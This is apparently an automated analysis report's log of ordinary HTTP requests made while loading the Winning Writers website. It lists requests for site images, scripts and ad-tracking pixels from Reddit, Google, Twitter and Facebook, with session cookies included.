          Source: global trafficHTTP traffic detected: GET /graphics/tompoetry/hagen_slide_show.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /assets/js/jquery-ck.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
          Source: global trafficHTTP traffic detected: GET /graphics/tompoetry/burton_slide_show.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /assets/js/pageslide.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_11an1ubt_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://winningwriters.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /graphics/tomstory/liu_home_page_slide.jpg HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /pixels/t2_11an1ubt/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://winningwriters.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/fancybox/jquery.fancybox.pack.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007
          Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1731960007980&id=t2_11an1ubt&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=814805a2-007a-47c4-a129-ea0a72736646&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/images/logo@2x.png HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
          Source: global trafficHTTP traffic detected: GET /assets/js/device.min.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960006858&cv=11&fst=1731960006858&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960006858&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSGwCa7L7d8_tahwouFkWEMPhMGqs141QoAhXnsQ&random=2808805193&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/jquery.cookie.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
          Source: global trafficHTTP traffic detected: GET /assets/js/jquery.matchHeight-min.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
          Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /uwt.js HTTP/1.1Host: static.ads-twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/ga-track.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
          Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_11an1ubt_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/hoverintent.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646
          Source: global trafficHTTP traffic detected: GET /pixels/t2_11an1ubt/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /signals/config/188856481728275?v=2.9.177&r=stable&domain=winningwriters.com&hme=c3e4904c1dde42d643265ef909b9e193c41cedcd6f559a3ff5e1b178e36647fa&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/feed.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
          Source: global trafficHTTP traffic detected: GET /assets/js/responsiveslides.js HTTP/1.1Host: winningwriters.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
          Source: global trafficHTTP traffic detected: GET /rp.gif?ts=1731960007980&id=t2_11an1ubt&event=PageVisit&m.itemCount=undefined&m.value=&m.valueDecimal=undefined&m.currency=undefined&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=814805a2-007a-47c4-a129-ea0a72736646&aaid=&em=&external_id=&idfa=&integration=gtm&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1Host: alb.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tr/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=PageView&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960008622&cd[eventID]=event.id.17319600027701&sw=1280&sh=1024&v=2.9.177&r=stable&ec=0&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&eid=event.id.17319600027701&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, triggerReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /assets/js/jquery-ck.js HTTP/1.1Host: winningwriters.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _ga=GA1.2.723902191.1731960008; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610
